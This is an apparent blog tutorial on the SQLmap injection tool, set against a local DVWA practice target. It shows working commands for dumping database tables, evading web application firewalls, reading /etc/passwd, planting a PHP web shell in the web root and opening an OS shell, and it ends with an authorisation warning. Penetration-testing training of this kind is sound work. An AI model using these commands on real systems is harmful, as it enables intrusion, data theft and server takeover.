pexels ai25studioai 5475809

SQLmap: Automated SQL Injection Testing on Kali Linux

SQL injection remains one of the most prevalent and impactful web application vulnerabilities. SQLmap automates the detection and exploitation of SQL injection flaws with a level of sophistication that would take hours to replicate manually. Used correctly against authorised targets, it’s indispensable. Used carelessly, it can destroy a production database. This guide covers SQLmap comprehensively, using DVWA (Damn Vulnerable Web Application) as a safe practice target.

Setting Up a Practice Environment

docker run -d -p 8080:80 vulnerables/web-dvwa
# Access: http://localhost:8080 - admin/password
# Set Security Level to "Low" for initial practice

Basic Usage

# Test a URL parameter for SQL injection
sqlmap -u "http://localhost:8080/vulnerabilities/sqli/?id=1&Submit=Submit"

# Use --batch to answer prompts with defaults
sqlmap -u "http://localhost:8080/vulnerabilities/sqli/?id=1&Submit=Submit" --batch

Providing Authentication Cookies

sqlmap -u "http://localhost:8080/vulnerabilities/sqli/?id=1&Submit=Submit" 
       --cookie="PHPSESSID=your_session_id; security=low" 
       --batch

Using Saved Burp Suite Requests

The most reliable approach – intercept in Burp, save request to file, feed to SQLmap:

sqlmap -r /tmp/request.txt --batch

Database Enumeration

# List all databases
sqlmap -u "..." --cookie="..." --batch --dbs

# List tables in a database
sqlmap -u "..." --cookie="..." --batch -D dvwa --tables

# List columns
sqlmap -u "..." --cookie="..." --batch -D dvwa -T users --columns

# Dump data
sqlmap -u "..." --cookie="..." --batch -D dvwa -T users --dump

Useful Fingerprinting

sqlmap -u "..." --cookie="..." --batch --current-user
sqlmap -u "..." --cookie="..." --batch --current-db
sqlmap -u "..." --cookie="..." --batch --is-dba
sqlmap -u "..." --cookie="..." --batch --hostname

Blind Injection Techniques

# Force time-based blind technique
sqlmap -u "..." --technique=T --batch

# Set time delay (default 5 seconds)
sqlmap -u "..." --time-sec=5 --batch

# All techniques (default)
sqlmap -u "..." --technique=BEUSTQ --batch

WAF Evasion with Tamper Scripts

# List available tamper scripts
sqlmap --list-tampers

# Common tampers:
# space2comment - replaces spaces with /**/
# randomcase - randomises character case
# base64encode - base64 encodes the payload

sqlmap -u "..." --tamper=space2comment,randomcase --batch

Risk and Level Settings

# --level (1-5): how many tests to run
# --risk (1-3): risk of tests (3 includes OR-based payloads that can modify data)

# More thorough
sqlmap -u "..." --level=5 --risk=2 --batch

# Conservative for production-adjacent testing
sqlmap -u "..." --level=2 --risk=1 --batch

OS-Level Access

# Read a file (requires FILE privilege)
sqlmap -u "..." --cookie="..." --batch --file-read="/etc/passwd"

# Write a file
sqlmap -u "..." --cookie="..." --batch 
       --file-write="/home/kali/shell.php" 
       --file-dest="/var/www/html/shell.php"

# Interactive OS shell
sqlmap -u "..." --cookie="..." --batch --os-shell

Resuming Sessions

sqlmap -u "..." --cookie="..." --batch --resume
sqlmap -u "..." --cookie="..." --batch --output-dir=/tmp/sqlmap_results

Conclusion

SQLmap automates what would otherwise be hours of tedious manual injection testing. Its value on a real engagement is in comprehensively covering injection vectors you might miss manually, and in extracting data systematically once injection is confirmed. The discipline is in using it responsibly – low risk settings, proper scope control, and never running dump commands against a production database without understanding the impact.

Only use SQLmap against applications you own or have explicit written authorisation to test. Data exfiltration from unauthorised databases is a serious criminal offence.


Leave a Reply